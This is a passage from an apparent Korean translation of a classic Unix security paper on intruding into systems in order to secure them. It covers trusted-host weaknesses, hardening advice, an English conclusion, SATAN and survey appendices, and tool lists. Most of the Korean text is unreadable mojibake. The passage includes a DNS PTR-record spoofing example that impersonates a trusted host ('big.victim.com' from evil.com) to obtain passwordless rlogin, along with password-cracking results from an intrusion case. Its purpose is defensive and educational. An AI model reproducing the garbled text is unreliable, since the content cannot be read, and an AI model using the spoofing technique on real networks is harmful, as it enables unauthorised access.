/etc/hosts ¸¦ ÀÌ¿ëÇÑ °£´ÜÇÑ ¹æ¹ýÀ̸ç, ÇöÀç´Â ´ëºÎºÐÀÌ DNS, NIS µîÀ» ÀÌ
¿ëÇϰí ÀÖ´Ù. Ŭ¶óÀÌ¾ðÆ®°¡ Á¢¼Ó ¿äû½Ã  IP ¾îµå·¹½º¿¡ ÀÇÇØ ¿ª lookup ÀÌ
ÀÌ·ç¾îÁ® ¿øÇϴ Ŭ¶óÀ̾ðÆ®ÀÎÁö È®ÀÎÀ» ¹Ù¶ó°Ô µÈ´Ù.                             

ÀÌ·¯ÇÑ È®ÀÎ ¹æ¹ý¿¡ ´ëÇØ  ¸¹´Â °ü¸®ÀÚµéÀÌ ÀÌÇØÇϰí ÀÖÁö¸¸ Áß¿äÇÑ ½ÇÁúÀû         
ÀÎ º¸¾È¹®Á¦´Â È£½ºÆ®À̸§ À§ÀåÀÇ  °æ¿ìÀÌ´Ù. À̰ÍÀº ´Ü¼øÈ÷ °ü¸®ÀÚµéÀÌ Àß
¾Ë°í ÀÖ´Â hosts.equiv ³ª .rhosts  ¹®Á¦, X À©µµ¿ì, NFS ¹®Á¦ÀÇ Â÷¿øÀ» ³Ñ
¾î¼± ¹®Á¦ÀÌ´Ù. ¾î¶°ÇÑ ½Å·ÚÀ̶ó ÇÒÁö¶óµµ À§ÀåµÇ°Å³ª ¹«·ÂÈ­µÇ°Å³ª ¹Ù²ãÄ¡
±â µÉ ¼ö Àִµ¥,ÀÌ´Â ¼­¹öÀÇ °ü¸®¿µ¿ª ¹Û¿¡ ÀÖ´Â authority °¡ Ŭ¶óÀ̾ðÆ®
Æ®ÀÇ ½Å·Ú¼º(Credential)À»  Á¡°ËÇϰųª ½Å·ÚÇϴ  ¸ÞÄ«´ÏÁòÀÌ ¸Å¿ì Ãë¾àÇÑ
°æ¿ì¿¡¼­ ºñ·ÔµÇ´Â °ÍÀÌ´Ù. ¸í¹éÈ÷ NIS, DNS µî¿¡¼­ÀÇ µ¥ÀÌŸº£À̽º°¡ ¸¸¾à
Ä§ÇØ ´çÇß´Ù¸é ħÀÔÀÚ´Â ½Å·ÚÇϴ  ½Ã½ºÅÛ¿¡¼­ÀÇ Á¢±ÙÀÎ °Í ó·³ À§ÀåÇÒ ¼ö
ÀÖÀ¸¸ç, À̰ÍÀ¸·Î ¸ñÇ¥½Ã½ºÅÛÀÌ ½Å·ÚÇϴ  ¾î¶² È£½ºÆ®°¡ ÀÖ´ÂÁö ÃæºÐÈ÷ ¾Ë
¼ö Àֱ⠶§¹®ÀÌ´Ù. ÀÌ ÀÛ¾÷Àº ½Ã½ºÅÛ°ü¸®ÀÚ³ª root ¿Í °°Àº °èÁ¤ÀÌ ¾î¶² È£
½ºÆ®¿¡¼­ Á¢±ÙÇÏ´ÂÁö¸¦ °Ë»çÇÏ¸é ¸Å¿ì µµ¿òÀÌ µÈ´Ù.

´Ù½Ã victim.com ÀÇ »ç·Ê·Î µ¹¾Æ°¡¼­ °ü¸®ÀÚ°¡ big.victim.com ¿¡¼­ Á¢±ÙÇÏ         
´Â  °ÍÀ» ¾Ë¾Ò´Ù°í  °¡Á¤Çغ¸ÀÚ.  evil.comÀÇ DNS  PTR  ·¹Äڵ带 ±³Ã¼ÇÏ¿©
evil.com ¿¡¼­ victim.com À¸·Î rlogin ÇÏ·ÁÇϸé victim.com Àº È£½ºÆ®À̸§
À» º¸·Á°í ÇÏ¿© ±³Ã¼ÇÑ ·¹Äڵ带 º¸°ÔµÉ °ÍÀÌ´Ù.
 
´ÙÀ½Àº ¿ø·¡ÀÇ PTR ·¹ÄÚµå¿Í ±³Ã¼ÇÑ PTR ·¹ÄÚµåÀÌ´Ù.

¿ø·¡ PTR  1.192.192.192.in-addr.arpa    IN      PTR    evil.com

¼öÁ¤ PTR  1.192.192.192.in-addr.arpa    IN      PTR    big.victim.com

´ÙÀ½¿¡´Â victim.com ¿¡  ´Þ·ÁÀִµ¥, big.victim.com ÀÌ /etc/hosts.equiv         
³ª .rhosts ¿¡ Á¸ÀçÇÑ´Ù¸é Á¢¼ÓÀ»  Çã¿ëÇÏ¿© ÆÐ½º¿öµå ¾øÀÌ Á¢±ÙÇÒ ¼ö ÀÖÀ»
°ÍÀÌ´Ù. NIS ¿¡¼­´Â ħÀÔÀÚ°¡ ¸¸¾à NIS ¸¶½ºÅ͸¦ Á¦¾îÇϰí ÀÖ´Ù¸é È£½ºÆ®µ¥
ÀÌŸº£À̽º¸¦ ¼öÁ¤ÇÏ´Â °ÍÀº  ´õ¿í ½¬¿î ÀÏÀ̸ç, ¿øÇϴ  Á¤º¸¸¦ °¡Áø ¸ñÇ¥
½Ã½ºÅÛÀ» ÀÌ¿ëÇÏ¿© NIS ¸¦ À§ÀåÇϰųª °­Á¦È­ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù.
 
ÀÌ·¯ÇÑ °ø°ÝÀ» ¸·±âÀ§ÇÑ 2°¡Áö  ¹æ¹ýÀÌ ÀÖ´Ù. ù°´Â ¸Å¿ì Á÷Á¢ÀûÀÌÁö¸¸ ºñ
Çö½ÇÀûÀÎ °ÍÀ¸·Î¼­ ´Ü¼øÈ÷ ¾î¶°ÇÑ È£½ºÆ®µµ  ¹ÏÁö ¾Ê´Â °ÍÀÌ´Ù.  ´Ù¸¥ ¹æ¹ý
Àº ¾ÏÈ£ÇÁ·ÎÅäÄÝÀ» »ç¿ëÇÏ´Â °ÍÀ¸·Î¼­ Secure NFS, NIS+ µîÀÇ Secure RPC¸¦
»ç¿ëÇÏ´Â ¹æ¹ýÀε¥, ¸¸¾à ¾ÏÈ£°¡ ±úÁø´Ù ÇÏ´õ¶óµµ ¾ÏÈ£¸¦ »ç¿ëÇÏÁö ¾Ê´Â ±â
Á¸ÀÇ ÀÎÁõ ¹æ½Äº¸´Ù ÈξÀ ¿ì¼öÇÏ´Ù. ´Ù¸¥ ¹æ¹ýÀ¸·Î¼­ smartcard Çϵå¿þ¾î¸¦
»ç¿ëÇϰųª, kerberos  µîÀÇ ¼ÒÇÁÆ®¿þ¾î¸¦ »ç¿ëÇÒ ¼ö  Àִµ¥, ÀüÀÚ´Â ¾ÆÁ÷
Àß °³¹ßµÈ »óŰ¡ ¾Æ´Ï¸ç, ÈÄÀÚ´Â ½Ã½ºÅÛÀÇ Àü¹ÝÀûÀÎ ¼öÁ¤ÀÌ ¿ä±¸µÈ´Ù.
ºÎ·Ï B ´Â ÀÎÅÍ³Ý ¿©·¯±ºµ¥¿¡¼­ °ËÅäÇÑ ºñ°ø½ÄÀÚ·á·Î¼­ º¸´Ù ÀÚ¼¼È÷ ¼³¸íÇÏ
°í ÀÖ´Ù.


Protecting the system

½Ã½ºÅÛº¸¾ÈÀ» À§ÇÑ ÀϹÝÀûÀÎ Á¦¾ÈµéÀ» º¸À̰íÀÚ ÇÑ´Ù.                             
 
- ¸¸¾à finger ¼­ºñ½º¸¦ ²À ÇØ¾ß ÇÑ´Ù¸é ¼öÁ¤µÈ ¹öÁ¯À» ¼³Ä¡Ç϶ó. »ç¿ëÀÚÀÇ
  Ȩ µð·ºÅ丮´Ï, ·Î±×ÀÎ ÇÑ È£½ºÆ®À̸§ µîÀ» ¾Ë¸± ÇÊ¿ä´Â ¾ø´Â °ÍÀÌ´Ù.
- Àý´ëÀûÀ¸·Î ÇÊ¿äÇÏÁö ¾Ê´Ù¸é NIS ¸¦ »ç¿ëÇÏÁö ¸»°ÍÀ̸ç, NFS µµ °¡´ÉÇÑ
  »ç¿ëÇÏÁö ¾Ê´Â´Ù.
- Àý´ë·Î NFS ÆÄÀϽýºÅÛÀ» ¿ÏÀüÈ÷(Worldwide) °ø°³ÇÏÁö ¸»°ÍÀ̸ç, °¡´ÉÇÑ
  Àбâ Àü¿ëÀ¸·Î ¸¸µé¾î¶ó.
- ¼­¹ö¸¦ ¹æ¾îÇÏ°í º¸È£ÇÑ´Ù. ´ÜÁö °ü¸®ÇÒ ¼ö ÀÖ´Â °èÁ¤¸¸À» Çã¿ëÇÑ´Ù.
- inetd ³ª portmapper µî¿¡¼­ ºÒÇÊ¿äÇÑ ¼­ºñ½º°¡ ¾ø´ÂÁö Á¡°ËÇÑ´Ù. ¸¸¾à
  Á¢¼ÓÇÏ´Â ½Ã½ºÅÛÀÇ ·Î±×¸¦ ±â·ÏÇÏ°í ½Í´Ù¸é wrapper ¸¦ »ç¿ëÇÏ´Â °ÍÀÌ
  ÁÁÀºµ¥, Ç¥ÁØ À¯´Ð½ºº¸´Ù ¿ì¼öÇÑ ·Î±×¿Í ƯÈ÷ ³×Æ®¿öÅ© °ø°Ý¿¡ ´ëÇÑ ±â·Ï
  ÀÌ ¿ì¼öÇÏ´Ù. ±×¸®°í °¡´ÉÇÑ º¸¾È °ü·Ã Á¤º¸¸¦ ÀÔ¼öÇϱâ À§ÇØ syslog ÀÇ
  loghost ¸ÞÄ«´ÏÁòÀ» ÀÌ¿ëÇ϶ó.
- ¿Ïº®ÇÏ°Ô ¹ÏÀ» ¼ö ÀÖ´Â ½Ã½ºÅÛÀÌ ¾ø´Ù¸é ½Å·ÚÇϴ ȣ½ºÆ®¸¦ ¾ø¾Ø´Ù.
- Shadow ÆÐ½º¿öµå¿Í À߸øµÈ ÆÐ½º¿öµå¸¦ °¡·Á³»´Â ÆÐ½º¿öµå ¸í·ÉÀ» »ç¿ë
  ÇÑ´Ù. »ç¿ëÇÏÁö ¾Ê´Â °èÁ¤°ú ½Ã½ºÅÛÀ» ¾ø¾Ø´Ù.
- ÃÖ±ÙÀÇ ÀÚ·á(Âü°í¹®Çå)¿Í µµ±¸µéÀ» ¼öÁýÇϸç, º¸¾È »ç°í ¹®Á¦³ª º¸¾È
  °ü·Ã ¹®Á¦¸¦ Áö¼ÓÀûÀ¸·Î ³²µé°ú ´ëÈ­ÇÑ´Ù. ÃÖ¼ÒÇÑ CERT mailing list
  ¿Í º¸¾ÈÀâÁö, Firewall mailing list, º¸¾È °ü·Ã ´º½º±×·ì µî¿¡ °¡ÀÔÇÑ
  ´Ù. ¹«°ü½Éµµ º¸¾È ¹®Á¦¿¡ °¡Àå Å« ÀûÀÌ´Ù.
- ±â°üÀÇ ¸ðµç È£½ºÆ®¿¡ ´ëÇØ °¡´ÉÇÑ ÃֽŠÆÐÄ¡¸¦ ¼³Ä¡ÇÑ´Ù.                       

³×Æ®¿öÅ© ¹æÇϺ®½Ã½ºÅÛ, Kerberos, ÀÏȸ¿ë ÆÐ½º¿öµå½Ã½ºÅÛ µîÀÌ º¸¾È¹®Á¦¸¦         
ÇØ°æÇϴµ¥ µµ¿òÀÌ µÇÁö¸¸ À§¿¡¼­  ¿©±â¿¡¼­ ¾Ë·ÁÁø ÀÌ·¯ÇÑ °ø°Ý¿¡ ¸ð¹« ¾È
ÀüÇÑ °ÍÀº ¾Æ´Ï´Ù. Áï À§ 3,  4 °¡Áö ¿ì¼öÇÑ º¸¾È ±â¹ýÀ» »ç¿ëÇÏ´Â °ÍÀÌ ÁÁ
´Ù°í ±Ç°íÇÏÁö¸¸ ¸ðµÎ ÇØ°áµÇ´Â °ÍÀº ¾Æ´Ï¶ó´Â ¸»ÀÌ´Ù.


Conclusions

Perhaps none of the methods shown here are surprising; when writing this
paper, we didn't learn very much about how to break into systems. What we
_did_ learn was, while testing these methods out on our own systems and
that of friendly sites, just how effective this set of methods is for
gaining access to a typical (UNIX) Internet host. Tiring of trying to type
these in all by hand, and desiring to keep our own systems more secure, we
decided to implement a security tool (SATAN) that attempts to check remote
hosts for at least some of the problems discussed here. The typical
response, when telling people about our paper and our tool was something on
the order of "that sounds pretty dangerous -- I hope you're not going to
give it out to everybody. But you since you can trust me, may I have a copy
of it?"

We never set out to create a cookbook or toolkit of methods and programs on
how to break into systems -- instead, we saw that these same methods were
being used, every day, against ourselves and against friendly system
administrators. We believe that by propagating information that normally
wasn't available to those outside of the underworld, we can increase
security by raising awareness. Trying to restrict access to "dangerous"
security information has never seemed to be a very effective method for
increasing security; indeed, the opposite appears to be the case, since the
system crackers have shown little reticence to share their information with
each other.

While it is almost certain that some of the information presented here is
new material to (aspiring) system crackers, and that some will use it to
gain unauthorized entrance onto hosts, the evidence presented even by our
ad hoc tests shows that there is a much larger number of insecure sites,
simply because the system administrators don't know any better -- they
aren't stupid or slow, they simply are unable to spend the very little free
time that they have to explore all of the security issues that pertain to
their systems. Combine that with no easy access to this sort of information
and you have poorly defended systems. We (modestly) hope that this paper
will provide badly-needed data on how systems are broken into, and further,
to explain _why_ certain steps should be taken to secure a system. Knowing
why something is a problem is, in our opinion, the real key to learning and
to making an informed, intelligent choice as to what security really means
for your site.

---------------------------------------------------------------------------

ºÎ·Ï A: SATAN (Security Analysis Tool for Auditing Networks)

SATANÀº º¸´Ù Å©°í ÀÌÇØÇϱ⠽¬¿î ÇÁ·ÎÅäŸÀÔ º¸¾È µµ±¸ÀÌ´Ù.  SATAN Àº           
¸ñÇ¥ÇÏ´Â ½Ã½ºÅÛÀÇ ÀϹÝÀûÀÌ°í µµ¿òÀÌ µÉ Á¤º¸¸¦ »ó¼¼ÇÏ°Ô º¸°íÇϰųª ³×Æ®¿ö
Å©¿Í À©µµ¿ì ½Ã½ºÅÛÀÇ ¹ö±×³ª º¸¾È Ãë¾à¿ä¼ÒµéÀ» Á¡°ËÇÏ¿© º¸°íÇÑ´Ù. ±×¸®°í
°á°ú µ¥ÀÌŸ¿¡ ´ëÇØ Á¤ÇØÁø ±ÔÄ¢¿¡ µû¸¥ ÇÊÅ͸µÀ» Çϰí ÃÖÁ¾ ºÐ¼® °á°ú¸¦ ¿ä¾à
Çϱâ À§ÇÑ Àü¹®°¡ÇÁ·Î±×·¥ÀÌ »ç¿ëµÈ´Ù. À̰ÍÀº ºü¸£°Ô 󸮵ÇÁö´Â ¾ÊÁö¸¸ Àß
¸ðµâÈ­µÇ¾îÀÖÀ¸¸ç, ½±°Ô ¼öÁ¤ÇÒ ¼ö ÀÖ´Ù.
SATAN Àº ¿©·¯°³ÀÇ ¼­ºêÇÁ·Î±×·¥À¸·Î ±¸¼ºµÇ¸ç, °¢°¢Àº Perl, Shell, C  ·Î ±¸Çö
µÇ¾î ÀÖÀ¸¸ç, °¢°¢ ÁÖ¾îÁø ¸ñÇ¥¸¦ °ø°Ý Á¡°ËÇÒ ¼ö ÀÖ´Ù. ÃßÈÄ È®ÀåÀ» À§Çؼ­´Â
¸ÞÀÎ µð·ºÅ丮¿¡ ".sat"½ÄÀÇ ½ÇÇàÇÁ·Î±×·¥À» Ãß°¡ÇÏ¸é µÈ´Ù. µå¶óÀ̹ö´Â ÁÖ¾îÁø
º¹Ç¥µé¿¡ ´ëÇØ  DNS, ping µîÀ¸·Î Á¸Àç À¯¹«¸¦ È®ÀÎÇÏ°í ½ÇÇàÆÄÀϵéÀÌ ½ÇÁ¦ ±×
½Ã½ºÅÛÀ» °ø°ÝÇÑ´Ù. °á°ú¸¦ ºÐ¼®ÇÏ´Â ÇÊÅ͸µ, ÀÎÅÍÇÁ¸®Æ® ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ¾î
¸¶Áö¸·À¸·Î »ç¿ëÀÚ°¡ ÀÐÀ» ¼ö ÀÖ´Â ÇüÅ·Π¿ä¾à º¸°íÇÑ´Ù.                         

---------------------------------------------------------------------------

ºÎ·Ï B: Àü»ê¸Á º¸¾È Á¡°Ë ¹× ºÐ¼® »ç·Ê

ºñ°ø½ÄÀûÀ¸·Î ´ëÇÐ, ±º»ç±â°ü ¹× ±â¾÷üÀÇ 200 ¿©È£½ºÆ® ¹× 40000¿©°³ÀÇ °èÁ¤       
¿¡ ´ëÇØ Á¡°ËÀ» ½ÇÇàÇѹ٠±â°üÀÇ Æò±Õ 10%°¡ .rhosts¸¦ °¡Áö°í ÀÖ¾úÀ¸¸ç À̰Í
µéÀº Æò±Õ 6°³ÀÇ ½Å·ÚÇϴ ȣ½ºÆ®µéÀ» °¡Áö°í ÀÖ¾ú´Ù. ÇÏÁö¸¸ ¾î¶² °æ¿ì¿¡´Â
100°³ ÀÌ»óÀÇ ¿£Æ®¸®¸¦ °¡Áö°Å³ª ½ÉÁö¾î 400 ¿©°³ÀÇ ¿£Æ®¸®¸¦ °¡Áø .rhosts ¸¦
°¡Áø °÷µµ ÀÖ¾ú´Ù.  ±×¸®°í ´ëºÎºÐÀÇ °æ¿ì ÀÎÅͳݿ¡ Á÷Á¢ ¿¬°áµÇ¾î ÀÖ¾ú°í ´Ü
Áö ÇϳªÀÇ ±â°ü¸¸ÀÌ ¹æÈ­º®À» ¿î¿µÇϰí ÀÖ¾ú´Âµ¥, ´ëºÎºÐ ±â°ü ¿ÜºÎ¿¡ ½Å·ÚÇÏ
´ÂÈ£½ºÆ®µéÀ» °¡Áö°í ÀÖ¾î ´ëºÎºÐ °ü¸®ÀÚÀÇ ÅëÁ¦ ¹Û¿¡ ÀÖ´Ù°í º¸ÀδÙ. ±Ô¸ð°¡
Å« ±â°üµéÀº .rhosts¸¦ º°·Î °¡Áö°í ÀÖÁö ¾Ê¾ÒÁö¸¸ ½Å·ÚÇÏÁö ¾Ê´Â È£½ºÆ® »Ó ¾Æ
´Ï¶ó .rhosts ÆÄÀÏÀÇ Å©±â´Â ´ë´ÜÈ÷ ÄÇ´Ù.

ºñ·Ï ¾ó¸¶³ª ¸¹Àº ¿£Æ®¸®µéÀÌ Á¤´çÇÑÁö È®ÀÎÇϱ⠾î·Á¿ü°í, ƯÈ÷ ¿ÍÀϵåÄ«µå,       
"Makefile". "Message-id:", "^Cs^A^C^M^Ci^C^MpNu^L^Z^O" µî¿¡ ´ëÇØ¼­´Â
¿Ã¹Ù¸£°Ô ½Å·ÚÇÏ´Â ½Ã½ºÅÛÀ¸·Î¼­ ±¸¼ºµÇ¾ú´ÂÁö¸¦ È®ÀÎÇϱ⠾î·Á¿üÁö¸¸, °¢ ±â
°üÀº ÀÚ½ÅÀÇ º¸¾ÈÀ» °¢ »ç¿ëÀÚ¿¡°Ô ¸Ã±â°í ÀÖ´Ù´Â °ÍÀ» ¾Ë ¼ö ÀÖ¾ú´Ù. ¸¹Àº
·®ÀÇ ¿£Æ®¸®¸¦ °¡Áø .rhosts ÆÄÀÏÀÇ °æ¿ì¿¡´Â ½© ÇüÅÂÀÇ ÄÚ¸àÆ®¸¦ ¸¹ÀÌ °¡Áö
°í ÀÖ¾ú´Âµ¥, ´ëºÎºÐÀÇ À¯´Ð½º¿¡¼­´Â ÀÌ·¯ÇÑ ÇüŸ¦ ¿Ã¹Ù¸£°Ô ÇØ¼®ÇÏÁö ¾ÊÀ¸
¸ç, ħÀÔÀÚÀÇ NIS, DNS ·Î È£½ºÆ®ÀÌ ¸§À» "#"À¸·Î À§ÀåÇÑ °ø°ÝÀ¸·Î ÀÚÀ¯·Ó°Ô
Á¢±ÙÇÑ´Ù.                               

¿©±â Á¶»çÇÑ ±â°üµéÀÌ ÀÎÅͳݿ¡¼­ÀÇ ´ëÇ¥ÀûÀÎ ±â°üÀ¸·Î ¹ßÇϱâ´Â ¾î·Æ°í »ç½Ç       
ÀÌ ¾Æ´ÒÁöµµ ¸ð¸¥´Ù.  ÇÏÁö¸¸ ¸¹Àº °ü¸®ÀÚµéÀº º¸¾È¿¬±¸³ª º¸¾ÈÁ¦Ç°¿¡ ´ëÇØ ÀÛ
¾÷µéÀ» ¸¹ÀÌ Çϰí ÀÖ¾úÀ» »Ó¸¸ ¾Æ´Ï¶ó Ãë¹Ì³ª Àü¹®À¸·Î ÇÁ·Î±×·¥À» ¸¸µé°í º¸
¾È °ü·Ã ÀÛ¾÷À» ¸¹ÀÌ Çϰí ÀÖ¾ú´ø °ÍÀ¸·Î º¸ÀδÙ.                                 

---------------------------------------------------------------------------

ºÎ·Ï C: ½Ã½ºÅÛ Áø´Ü »ç·Ê

¿ì¸®°¡ °¡Áø ½Ã½ºÅÛÀÇ Çϳª¿¡¼­ Ãâ¹ßÇÑ Ä§ÀÔÀ» ¾Ë¸®´Â ÀüÀÚ¿ìÆíÀ» ¹Þ°í Á¶»ç¿¡     
Âø¼öÇÏ¿©  ¾î¶² ±â¾÷ü¿¡¼­ ¿Â ħÀÔÀÚ°¡ ÆÐ½º¿öµå¸¦ ÈÉÄ¡±â ½¬¿î ±â°üµéÀ» °Ë
ÅäÇϰí ÀÖ´Â °ÍÀ» ¹ß°ßÇÏ¿´´Ù. À̶§ ÆÐ½º¿öµå¸¦ ÈÉÄ¡±â ½¬¿î ±â°üÀ̶õ NIS µµ
¸ÞÀÎÀ̸§À» ½±°Ô À¯ÃßÇÒ ¼ö Àִٵ簡 NIS ¼­¹ö¿¡ ½±°Ô Á¢±ÙÇÒ ¼ö ÀÖ´Â ±â°üÀ»
ÀǹÌÇÑ´Ù. ħÀÔÀÚ°¡ ¾ó¸¶³ª ÁøÀüÀÌ ÀÖ¾ú´ÂÁö ´Â ¸ð¸£Áö¸¸ ÀÌ ±â°ü¿¡ °æ°í¸¦ ÁÖ
´Â ÀÏÀ» Çϱâ·Î ÇÏ¿´´Ù. ħÀÔÀÚ´Â 656°³ÀÇ È£½ºÆ®¸®½ºÆ®¸¦ °¡Áö°í ÀÖ¾ú´Âµ¥,
±×Áß¿¡¼­ 25°³ÀÇ È£½ºÆ®¿¡¼­ 24°³´Â ½±°Ô ÈÉÃij¾ ¼ö ÀÖ¾úÀ¸¸ç, ÀÌ Áß 3 ºÐÀÇ
1Àº Àû¾îµµ ÇϳªÀÇ ÆÐ½º¿öµå ¾ø´Â °èÁ¤À¸·Î ´ëÈ­Çü ½©À» °¡Áö°í ÀÖ¾ú´Ù.  ÃÑ
1594°³ÀÇ ÆÐ½º¿öµå ÆÄÀÏ ¿£Æ®¸®¿¡¼­ ³·Àº ¼öÁØÀÇ SUN ½Ã½ºÅÛ¿¡¼­ 10ºÐ¸Á¿¡
50°³ ÀÌ»óÀÇ ÆÐ½º¿öµå¸¦ ¾Ë¾Æ³»¾úÀ¸¸ç, 40%´Â ´ÙÀ½ 20ºÐ ¸¸¿¡, root ÀÇ ÆÐ½º¿ö
µå¸¦ 1 ½Ã°£¸¸¿¡ Çϳª ¾Ë¾Æ¾Ö¾ú´Ù. ¸¶À½ ¸çÄ¥ ¸¸¿¡´Â 5°³ÀÇ root ÆÐ½º¿öµå¸¦
¾Ë¾Æ³»¾ú´Ù. °á±¹ 24°³(80%)ÀÇ ÆÐ½º¿öµå ÆÄÀÏÀÌ Àû¾îµµ ÇϳªÀÇ À߾˷ÁÁø ÆÐ½º
¿öµå¸¦ °¡Áö°í ÀÖ¾úÀ¸¸ç, 1594°³ÀÇ ¿£Æ®¸®Áß 259(6ºÐÀÇ 1)°³ÀÇ ÆÐ½º¿öµå°¡ ½±
°Ô ÃßÁ¤ ÇÒ ¼ö ÀÖ¾ú´Ù.                                                         

---------------------------------------------------------------------------

ºÎ·Ï D: ¹«·á ÀÎÅÍ³Ý º¸¾È ÀڷḦ ¹ÞÀ¸·Á¸é

Mailing lists:

  *  The CERT (Computer Emergency Response Team) advisory mailing list.
    Send e-mail to cert@cert.org, and ask to be placed on their mailing
    list.

  *  The Phrack newsletter. Send an e-mail message to phrack@well.sf.ca.us
    and ask to be added to the list.

  *  The Firewalls mailing list. Send the following line to
    majordomo@greatcircle.com:

        subscribe firewalls

  *  Computer Underground Digest. Send e-mail to tk0jut2@mvs.cso.niu.edu,
    asking to be placed on the list.

Free Software:

COPS (Computer Oracle and Password System) is available via anonymous ftp
from archive.cis.ohio-state.edu, in pub/cops/1.04+.

The tcp wrappers are available via anonymous ftp from ftp.win.tue.nl, in
pub/security.

Crack is available from ftp.uu.net, in /usenet/comp.sources.misc/volume28.

TAMU is a UNIX auditing tool that is part of a larger suite of excellent
tools put out by a group at the Texas A&M University. They can be gotten
via anonymous ftp at net.tamu.edu, in pub/security/TAMU.

Sources for ftpd and many other network utilities can be found in
ftp.uu.net, in packages/bsd-sources.

Source for ISS (Internet Security Scanner), a tool that remotely scans for
various network vulnerabilities, is available via anonymous ftp from
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.

Securelib is available via anonymous ftp from ftp.uu.net, in
usenet/comp.sources.misc/volume36/securelib.

The latest version of berkeley sendmail is available via anonymous ftp from
ftp.cs.berkeley.edu, in ucb/sendmail.

Tripwire, a UNIX filesystem integrity checker+, is available via anonymous
ftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire.

---------------------------------------------------------------------------

Âü°í¹®Çå:

Baldwin, Robert W., Rule Based Analysis of Computer Security, Massachusetts
Institute of Technology, June 1987.

Bellovin, Steve, Using the Domain Name System for System Break-ins, 1992
(unpublished).

Massachusetts Institute of Technology, X Window System Protocol, Version
11, 1990.

Shimomura, Tsutomu, private communication.

Sun Microsystems, OpenWindows V3.0.1 User Commands, March 1992.

---------------------------------------------------------------------------

Ãßõ Âü°í¹®Çå:

Bellovin, Steve -- "Security Problms in the TCP/IP Protocol Suite",
Computer Communication Review 19 (2), 1989; a comment by Stephen Kent
appears in volume 19 (3), 1989.

Garfinkel, Simson and Spafford, Gene, "Practical UNIX Security", O'Reilly
and Associates, Inc., 1992.

Hess, David, Safford, David, and Pooch, Udo, "A UNIX Network Protocol
Study: Network Information Service", Computer Communication Review 22 (5)
1992.

Phreak Accident, Playing Hide and Seek, UNIX style, Phrack, Volume Four,
Issue Forty-Three, File 14 of 27.

Ranum, Marcus, "Firewalls" internet electronic mailing list, Sept 1993.

Schuba, Christoph, "Addressing Weaknesses in the Domain Name System
Protocal", Purdue University, August 1993.

Thompson, Ken, Reflections on Trusting Trust, Communications of the ACM 27
(8), 1984.

½Å¿µÃ¶ ´ÔÀÇ Linux ÃÖ½Å±Û [´õº¸±â]


   

 

naver.com daum.net nate.com google.co.kr youtube.com


Copyright ¨Ï www.pronice.com. All rights reserved.